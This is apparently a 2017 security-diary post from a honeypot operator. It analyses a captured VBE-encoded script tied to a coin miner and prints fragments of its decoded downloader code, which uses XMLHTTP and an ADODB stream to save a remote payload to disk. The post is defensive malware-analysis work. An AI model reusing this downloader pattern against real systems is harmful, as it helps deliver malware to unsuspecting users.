My honeypot captured several copies of this file info.zip (info.vbe). I used Didier's Python script decode-vbe.py to examine the file and obtained following output: vagrant@brain:~$ ./decode-vbe.py info.vbe objADOStream.Write objXMLHTTP.ResponseBody Set objFSO = Createobject("Scripting.FileSystemObject") objADOStream.SaveToFile strHDLocation Set objXMLHTTP = Nothing WScript.Quit This VBE encoded script is currently detected by 41 AV engines and associated with a Coin Miner. The file in this URL is no longer active but the domain still resolves and should be blocked. [1] https://blog.didierstevens.com/2016/03/29/decoding-vbe/ ----------- |
Guy 486 Posts ISC Handler Nov 13th 2017 |
Thread locked Subscribe |
Nov 13th 2017 3 years ago |
Sign Up for Free or Log In to start participating in the conversation!